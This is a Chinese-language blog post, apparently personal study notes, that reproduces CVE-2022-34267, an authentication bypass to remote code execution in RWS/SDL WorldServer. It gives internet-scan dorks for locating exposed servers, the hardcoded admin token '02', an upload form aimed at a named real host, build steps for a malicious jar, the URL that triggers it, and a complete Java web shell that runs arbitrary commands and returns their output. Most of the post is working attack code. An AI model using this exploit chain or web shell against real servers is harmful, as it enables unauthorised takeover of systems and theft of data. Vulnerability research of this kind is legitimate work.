CVE-2022-34267 SDL WorldServer 身份认证绕过 RCE

漏洞信息

漏洞名称:CVE-2022-34267 SDL WorldServer 身份认证绕过 RCE

产品:RWS WorldServer

搜索语法:

  • FOFA:icon_hash=”1129570087”
  • Hunter:web.icon==”b774528f2f5c4a7ed046f40eebf51954”
  • QUAKE:favicon: “b774528f2f5c4a7ed046f40eebf51954”

漏洞详情

其通过 FFUF 对 /ws-api/v2/info?token= 的 token 进行 FUZZ 发现了当 token 为 02 时就是一个系统管理员的身份,这可能是程序员留下了的后门:

1
2
3
public static boolean isSystemSessionToken(String token) {
return (token != null && token.trim().equals(String.valueOf(2)));
}

那么就导致了可利用 api 进行操作,最终其实现 RCE 的方法是去自定义 API 拿 shell:

RWS Documentation

这里可以通过向 <protocol>://<ws-host>:<ws-port>/ws-api/v1/customizations/api?token=<sessionId> 端点发现 POST 请求上传 jar 文件来实现。

上传表单:

1
2
3
4
5
6
7
8
9
10
11
12
13
</!DOCTYPE html>
<html>
<head>
<title>file upload</title>
</head>
<body>
<h2>hello</h2>
<form action="https://wsdev.spartansoftwareinc.com/ws-api/v2/customizations/api?token=02" method="post" enctype="multipart/form-data">
<input type="file" name="file"/>
<input type="submit" value="Submit" />
</form>
</body>
</html>

但是制作 jar 需要有这个 wssdk :

image-20240126142726042

我们只需要实现一个假的 com.idiominc.wssdk.WSContext 然后在 maven 中进行本地引入即可。

image-20240126143213825

制作一个假的:

image-20240126143316741

image-20240126143331122

maven package 为 jar 包。

放到 resources 目录下 本地引入 :

1
2
3
4
5
6
7
<dependency>
<groupId>com.sdl.lt.worldserver</groupId>
<artifactId>wssdk</artifactId>
<version>1.0</version>
<scope>system</scope>
<systemPath>${basedir}\src\main\resources\wssdk-1.0-SNAPSHOT.jar</systemPath>
</dependency>

根据 API 文档引入指定版本的 spring-webmvc

1
2
3
4
5
6
<dependency>
<groupId>org.springframework</groupId>
<artifactId>spring-webmvc</artifactId>
<version>4.1.7.RELEASE</version>
<scope>provided</scope>
</dependency>

打包上传

image-20240126143621343

然后不知道怎么触发 …

没找到相关文档,试了几次发现访问 /ws-api/extensions/shell/clients 即可触发。

使用 GPT 写带参数并且成有回显的:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
package com.sdl.lt.worldserver.customizations.newextension;
import com.idiominc.wssdk.WSContext;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.RestController;
import java.io.BufferedReader;
import java.io.InputStreamReader;

@RestController
@RequestMapping("/extensions/shell")
public class NewExtension {
@Autowired
private WSContext context;

@RequestMapping(value = "/clients", method = {RequestMethod.GET})
public String shell(@RequestParam(value = "cmd", defaultValue = "") String cmd) {
// 检查cmd参数是否为空
if (cmd.isEmpty()) {
return "PoC - Remote Code Execution";
}

StringBuilder output = new StringBuilder();
Process p;
try {
// 执行命令
p = Runtime.getRuntime().exec(cmd);
p.waitFor();
BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));

String line;
while ((line = reader.readLine()) != null) {
output.append(line).append("\n");
}
} catch (Exception e) {
return "Error executing command: " + e.getMessage();
}
return output.toString();
}
}

学习总结

  1. session 这个东西竟然可以去尝试 FUZZ
  2. 不要死跟着博客的利用,因为就是找不到这个 sdk,而需要它的原因就是让 jar 打包成功,那么就可以尝试自己写一个假的去测试

参考链接


CVE-2022-34267 SDL WorldServer 身份认证绕过 RCE
https://liancccc.github.io/2023/11/15/技术/漏洞分析/CVE-2022-34267/
作者
守心
发布于
2023年11月15日
许可协议